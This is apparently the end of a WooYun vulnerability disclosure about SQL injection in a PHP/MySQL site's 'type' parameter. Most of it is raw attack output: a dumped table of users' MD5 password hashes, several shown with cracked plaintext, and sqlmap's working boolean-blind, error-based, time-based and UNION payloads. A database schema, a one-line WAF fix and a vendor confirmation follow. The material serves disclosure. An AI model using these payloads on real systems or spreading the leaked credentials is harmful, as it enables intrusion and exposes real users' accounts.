| 9f3e2fe4bfb8e092633c83fe08beec88 |
| a05c04be378a7197474aae4fc77d50b5 |
| a1324603d9b1a22277809229934a36fd |
| a385db8d1fb6efa08e2bd81a8832f6e6 |
| a4eca9639a4c44026b37d2d6ecc9e8a6 |
| a4f20e2254e50ae4869acec59085c97b |
| a5992fa77608cdf30bb77f751a7544e0 |
| a6bad684d23f0d0cd28c2d228d6c3204 |
| a6de74ce6e778d71e51a4d611e20235b |
| aa0d2a804a3510442f2fd40f2100b054 (5353) |
| aa85abc2ea6d5f75b4835244429bb89c |
| acb2fda943c93f19f4474a77f5d26851 |
| adb2bb6dbad1fd4cc98b7da2477c01e9 |
| b43f116f81aeb9c12ba67fc3f8f84707 |
| b49c35f006e255a3d7fabb719a210ab3 |
| bb10820886460bc2f132831c3c621288 |
| bc1f6c33378ebfaf9033af56e2dd5af8 |
| bc7e39dce5761c7777dc7aa35b5ca770 |
| bd155b378d0918dd3e931bb5ff80092c |
| c398c315bd27d5a44050de25df0e4de2 |
| c975d3b2a93bf3b53983569737ce9a9c |
| cb6682f9983f2c93d21d725306e93ebd |
| cd2acea595e93463bc8ea3b6d1583fc9 (0321) |
| cd396698aee89e20bb7ee407e7a8e59c |
| ce94e8e4da9c82c35e818993aaa6e8c4 |
| cf06f5fce9ddf4eccdf49e4ec941dd34 |
| cf5e9d0beca4c810f69c242be4eeef47 |
| d0970714757783e6cf17b26fb8e2298f (112233) |
| d2b23b1514a3474743e09026597fb00f |
| d3e0bf8e9ab38a59ae5cd05043fa63c7 |
| d55fc9c88b6183fbdfb29b09ffd00f68 |
| d8b47331f850e426bc1ed3d79357aff2 |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e282d1cf59bc440f418e92b618e37e14 (180404) |
| e52ce7ec465331a59618f9b7a9cde01f |
| e687f9d8e0057a0df4b29d1950accc16 |
| e7870c1ead6e9ff16b0372aa9a7c5f1d |
| e807f1fcf82d132f9bb018ca6738a19f (1234567890) |
| ec2d748dd8ebbe57a8aa437335dac40e |
| ed9b877050e565bf90f38efa01e86183 |
| f00b8fc4f154d3c3657a0a96089b54ad |
| f166cce76594c3330849cce8ff149950 |
| f17f496114257958694ee1be75bdabe6 |
| f2b3e0105fbfd24a0e12dede5f01353e |
| f573e528c6f84971caccb669d6c21e40 (341302) |
| f6633bd140c595a684c96dbfda0f8911 |
| f6ccba3c2031da35da75efe44805f20a |
| f7d3cdde467986687747c724fdb4ecba |
| f8b74066ef624b80561fba631ddc6189 |
| f9b99740b3e953f65230685fb47b3a9a |
| fb8caf1131954ed0f9fca70356e77020 |
| fcc180feed12b433f79e6a82064b09e0 |
| fcea920f7412b5da7be0cf42b8c93759 (1234567) |
| fd776919ff9b8fe0fb9739339877c8c2 |
| fe27c4f551fae15918ca1c56e048dd28 |
+-----------------------------------------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: type (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: cate=game&type=3 AND 5373=5373&id=5694
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: cate=game&type=3 AND (SELECT 5870 FROM(SELECT COUNT(*),CONCAT(0x7162767171,(SELECT (ELT(5870=5870,1))),0x716a6a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&id=5694
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: cate=game&type=3 AND (SELECT * FROM (SELECT(SLEEP(5)))pazb)&id=5694
Type: UNION query
Title: MySQL UNION query (NULL) - 58 columns
Payload: cate=game&type=-7466 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162767171,0x7547446c7269416451444379784d6f53474b555a4e457154566546554c446959486a757152584e6b,0x716a6a6271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&id=5694
---
web application technology: PHP 4.4.4, Apache 2.0.64
back-end DBMS: MySQL 5.0
Database: ctba
Table: record_all
[13 columns]
+-----------------+------------------+
| Column | Type |
+-----------------+------------------+
| player_id_b | int(10) |
| player_id_p | int(10) |
| rec_1b | char(1) |
| rec_2b | char(1) |
| rec_3b | char(1) |
| rec_bhand | char(1) |
| rec_calendar_id | int(10) |
| rec_er | int(1) |
| rec_id | int(11) unsigned |
| rec_inning | varchar(3) |
| rec_r | int(1) |
| rec_rbi | int(1) |
| rec_result | varchar(10) |
+-----------------+------------------+

修复方案:

上WAF。

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:17

确认时间:2015-11-27 21:44

厂商回复:

感謝通報

最新状态:

暂无